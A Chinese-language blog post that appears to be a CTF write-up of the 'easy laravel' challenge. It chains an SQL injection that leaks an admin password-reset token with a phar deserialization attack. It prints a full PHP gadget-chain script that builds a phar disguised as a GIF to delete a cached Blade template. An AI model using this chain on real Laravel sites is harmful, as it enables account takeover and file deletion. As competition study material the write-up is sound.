<!doctype html>
<html lang="en">
    <head>
		
        <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="description" content="venenof7's blog">
        <link rel="shortcut icon" href="/styles/ven.pic.jpg"/>
        <link rel="canonical" href="http://guolinn.com/">
        <link rel="alternate" type="application/rss+xml" title="venenof7" href="">
        <title>护网杯-easy laravel-Writeup | venenof7&#39;s blog</title>
        <meta name="description" content="{{meta_description}}">

        <link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">
        <link rel="stylesheet" type="text/css" href="/styles/crisp.css">
        <meta name="HandheldFriendly" content="True" />
        <meta name="MobileOptimized" content="320" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
        <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->

    <meta name="generator" content="Hexo 6.3.0"></head>
    
		<body class="post-template">
	

        <header id="header">
            <a id="logo" href="/"><img src="/styles/ven.pic.jpg" alt="venenof7's blog" /></a>
            <h1><a href="/">venenof7</a></h1>
            <a href="https://nu1l.com" target="_blank"><p style="color:#5cc2c0">Nu1L Team</p></a>
            <div id="follow-icons">
              </div>
<h6><a href="/about">About</a></h6>
        </header>

        <main id="content">
        <meta name="referrer" content="no-referrer" />


<article class="post">
  十月 14, 2018
  
    <span class="taglist">  &middot; 
    
    
      <a href='/tags/ctf/'>ctf</a> 
    
      <a href='/tags/laravel/'>laravel</a> 
    
    </span>
  

  <h1 class="post-title">护网杯-easy laravel-Writeup</h1>
  <section class="post-content article-entry">
    <p>护网杯碰到一个Laravel的代码审计题目，刚好最近在用LA写平台，于是就很感兴趣，题目整体不难，对Laravel框架熟悉就可以做，但整个利用链构造的比较巧妙，感谢出题人@4uuu Nya出了这么一个有意思的题目。</p>
<p>源码可以发现<a target="_blank" rel="noopener" href="https://github.com/qqqqqqvq/easy_laravel%EF%BC%8C%E4%B8%8B%E8%BD%BD%E4%B8%8B%E6%9D%A5%E6%9C%AC%E5%9C%B0%E7%9C%8B%E4%B8%80%E4%B8%8B%E6%BA%90%E7%A0%81%EF%BC%9A">https://github.com/qqqqqqvq/easy_laravel，下载下来本地看一下源码：</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$factory</span>-&gt;<span class="title function_ invoke__">define</span>(<span class="title class_">App\User</span>::<span class="variable language_">class</span>, function (Faker\<span class="built_in">Generator</span> <span class="variable">$faker</span>) &#123;</span><br><span class="line">    <span class="built_in">static</span> <span class="variable">$password</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> [</span><br><span class="line">        <span class="string">&#x27;name&#x27;</span> =&gt; <span class="string">&#x27;4uuu Nya&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;email&#x27;</span> =&gt; <span class="string">&#x27;admin@qvq.im&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;password&#x27;</span> =&gt; <span class="title function_ invoke__">bcrypt</span>(<span class="title function_ invoke__">str_random</span>(<span class="number">40</span>)),</span><br><span class="line">        <span class="string">&#x27;remember_token&#x27;</span> =&gt; <span class="title function_ invoke__">str_random</span>(<span class="number">10</span>),</span><br><span class="line">    ];</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>很显然，管理员的登陆邮箱已经知道了，同时也知道密码是随机40位字符串，基本不可能爆破。<br>看一下路由，发现只有note可以在非admin用户下访问，看一下NoteController:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params">Note <span class="variable">$note</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$username</span> = <span class="title class_">Auth</span>::<span class="title function_ invoke__">user</span>()-&gt;name;</span><br><span class="line">    <span class="variable">$notes</span> = DB::<span class="title function_ invoke__">select</span>(<span class="string">&quot;SELECT * FROM `notes` WHERE `author`=&#x27;<span class="subst">&#123;$username&#125;</span>&#x27;&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">view</span>(<span class="string">&#x27;note&#x27;</span>, <span class="title function_ invoke__">compact</span>(<span class="string">&#x27;notes&#x27;</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>明显的sqli，我们可以获取任何数据库中的内容，但是密码我们即使拿到了也没有什么用，我们发现其注册登陆的整个流程都是Laravel官方推荐的，也就是管理员肯定是这么安装的:<br><code>php artisan make:auth</code><br>既然没有重构这部分代码，也就意味着我们可以去重置管理员密码，点击重置密码时，输入管理员邮箱<a href="mailto:&#x61;&#100;&#109;&#105;&#110;&#64;&#113;&#x76;&#113;&#x2e;&#105;&#x6d;">&#x61;&#100;&#109;&#105;&#110;&#64;&#113;&#x76;&#113;&#x2e;&#105;&#x6d;</a>，那么password_resets中会更新一个token，访问&#x2F;password&#x2F;reset&#x2F;token即可重置密码，首先利用注入拿到token：<br><img src="https://cdn.nlark.com/yuque/0/2023/png/21442249/1673253723337-0df6f543-8c25-41e2-b465-a9b7a0517b6a.png" alt="image.png"><br>然后修改密码即可:<br><img src="https://cdn.nlark.com/yuque/0/2023/png/21442249/1673253735828-bb46c4cf-a8f3-4961-b459-ddce4aa64b7d.png#averageHue=%23afd6a0&clientId=u568e1f7a-8e1c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=440&id=u076375f1&margin=%5Bobject%20Object%5D&name=image.png&originHeight=880&originWidth=2546&originalType=binary&ratio=1&rotation=0&showTitle=false&size=142748&status=done&style=none&taskId=u2bb6a414-3835-4f9a-bd32-9adc2c8f0d0&title=&width=1273" alt="image.png"></p>
<h2 id="Blade-模版"><a href="#Blade-模版" class="headerlink" title="Blade 模版"></a>Blade 模版</h2><p>进入后台后，访问<a target="_blank" rel="noopener" href="http://49.4.78.51:32310/flag%E6%98%AF%E6%8F%90%E7%A4%BAno">http://49.4.78.51:32310/flag是提示no</a> flag，但是我们看一下FlagController</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">showFlag</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$flag</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;/th1s1s_F14g_2333333&#x27;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">view</span>(<span class="string">&#x27;auth.flag&#x27;</span>)-&gt;<span class="title function_ invoke__">with</span>(<span class="string">&#x27;flag&#x27;</span>, <span class="variable">$flag</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>很明显，blade渲染的跟我们看到的明显不一样，如果用Laravel写过东西，经常会遇到这种问题，明明blade更新了，页面却没有显示，这都是因为Laravel的模版缓存，很明显，现在我们需要去更改flag的模版缓存，缓存文件的名字是laravel自动生成的，生成方法如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Get the path to the compiled version of a view.</span></span><br><span class="line"><span class="comment">     *</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span>  string  $path</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> string</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getCompiledPath</span>(<span class="params"><span class="variable">$path</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;cachePath.<span class="string">&#x27;/&#x27;</span>.<span class="title function_ invoke__">sha1</span>(<span class="variable">$path</span>).<span class="string">&#x27;.php&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>但是整个站的逻辑很简单，没有其他文件操作的点，那么就剩下了UploadController，只能上传图片，但是有一个方法引起了我的兴趣：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params">Request <span class="variable">$request</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$path</span> = <span class="variable">$request</span>-&gt;<span class="title function_ invoke__">input</span>(<span class="string">&#x27;path&#x27;</span>, <span class="variable">$this</span>-&gt;path);</span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$request</span>-&gt;<span class="title function_ invoke__">input</span>(<span class="string">&#x27;filename&#x27;</span>, <span class="literal">null</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$filename</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$path</span> . <span class="variable">$filename</span>))&#123;</span><br><span class="line">            <span class="title class_">Flash</span>::<span class="title function_ invoke__">error</span>(<span class="string">&#x27;磁盘文件已删除，刷新文件列表&#x27;</span>);</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="title class_">Flash</span>::<span class="title function_ invoke__">success</span>(<span class="string">&#x27;文件有效&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">redirect</span>(<span class="title function_ invoke__">route</span>(<span class="string">&#x27;files&#x27;</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>path跟filename没有任何过滤，而我们可以利用file_exists去操作phar包，这里很明显存在一个反序列化，于是现在的思路很明确：<br>phar反序列化&#x3D;&gt;文件操作删除或者移除&#x3D;&gt;laravel重新渲染blade&#x3D;&gt;读取flag<br>看了下composer，发现都是默认组件，于是全局搜一下unlink，在Swift_ByteStream_TemporaryFileByteStream的析构函数中存在unlink方法:<br><img src="https://cdn.nlark.com/yuque/0/2023/png/21442249/1673253821877-73afd1aa-0735-4bf5-97eb-d4a261e817d4.png" alt="image.png"><br>于是直接构造即可:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Swift_ByteStream_AbstractFilterableInputStream</span> </span>&#123;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Write sequence.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$sequence</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * StreamFilters.</span></span><br><span class="line"><span class="comment">     *</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@var</span> Swift_StreamFilter[]</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$filters</span> = [];</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * A buffer for writing.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$writeBuffer</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Bound streams.</span></span><br><span class="line"><span class="comment">     *</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@var</span> Swift_InputByteStream[]</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$mirrors</span> = [];</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Swift_ByteStream_FileByteStream</span> <span class="keyword">extends</span> <span class="title">Swift_ByteStream_AbstractFilterableInputStream</span> </span>&#123;</span><br><span class="line">    <span class="comment">/** The internal pointer offset */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$_offset</span> = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/** The path to the file */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$_path</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/** The mode this file is opened in for writing */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$_mode</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/** A lazy-loaded resource handle for reading the file */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$_reader</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/** A lazy-loaded resource handle for writing the file */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$_writer</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/** If magic_quotes_runtime is on, this will be true */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$_quotes</span> = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/** If stream is seekable true/false, or null if not known */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$_seekable</span> = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Create a new FileByteStream for $path.</span></span><br><span class="line"><span class="comment">     *</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $path</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> bool   $writable if true</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$path</span>, <span class="variable">$writable</span> = <span class="literal">false</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;_path = <span class="variable">$path</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;_mode = <span class="variable">$writable</span> ? <span class="string">&#x27;w+b&#x27;</span> : <span class="string">&#x27;rb&#x27;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">function_exists</span>(<span class="string">&#x27;get_magic_quotes_runtime&#x27;</span>) &amp;&amp; @<span class="title function_ invoke__">get_magic_quotes_runtime</span>() == <span class="number">1</span>) &#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;_quotes = <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Get the complete path to the file.</span></span><br><span class="line"><span class="comment">     *</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> string</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getPath</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;_path;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Swift_ByteStream_TemporaryFileByteStream</span> <span class="keyword">extends</span> <span class="title">Swift_ByteStream_FileByteStream</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="variable">$filePath</span> = <span class="string">&quot;/usr/share/nginx/html/storage/framework/views/34e41df0934a75437873264cd28e2d835bc38772.php&quot;</span>;</span><br><span class="line">        <span class="built_in">parent</span>::<span class="title function_ invoke__">__construct</span>(<span class="variable">$filePath</span>, <span class="literal">true</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(<span class="variable">$this</span>-&gt;<span class="title function_ invoke__">getPath</span>())) &#123;</span><br><span class="line">            @<span class="title function_ invoke__">unlink</span>(<span class="variable">$this</span>-&gt;<span class="title function_ invoke__">getPath</span>());</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> <span class="title class_">Swift_ByteStream_TemporaryFileByteStream</span>();</span><br><span class="line"><span class="variable">$p</span> = <span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&#x27;./1.phar&#x27;</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$p</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"><span class="variable">$p</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="string">&#x27;GIF89a&lt;?php __HALT_COMPILER(); ?&gt;&#x27;</span>);</span><br><span class="line"><span class="variable">$p</span>-&gt;<span class="title function_ invoke__">setMetadata</span>(<span class="variable">$obj</span>);</span><br><span class="line"><span class="variable">$p</span>-&gt;<span class="title function_ invoke__">addFromString</span>(<span class="string">&#x27;1.txt&#x27;</span>,<span class="string">&#x27;text&#x27;</span>);</span><br><span class="line"><span class="variable">$p</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();</span><br><span class="line"><span class="title function_ invoke__">rename</span>(<span class="string">&#x27;./1.phar&#x27;</span>, <span class="string">&#x27;1.gif&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>然后上传，check的时候触发反序列化即可删除模版文件，然后访问flag路由拿到flag:-P<br><img src="https://cdn.nlark.com/yuque/0/2023/png/21442249/1673253852740-7d0dee12-cc50-4949-9259-4d74073f59a5.png" alt="image.png"></p>

  </section>
  <footer class="post-footer">
    <!--
    <section class="author">
      <h4>venenof7</h4>
      <p></p>
    </section>
    -->
  </footer>
</article>

<nav class="pagination" role="pagination">
    
    <a class="newer-posts" href="/2023/01/01/hi-2023/">
        ← prev <!--hi 2023-->
    </a>
    
    <span class="page-number">•</span>
    
</nav>

        </main>
        <footer id="footer">
            <section id="footer-message">&copy; 2023 venenof7. All rights reserved.</section>
        </footer>
    </body>
</html>


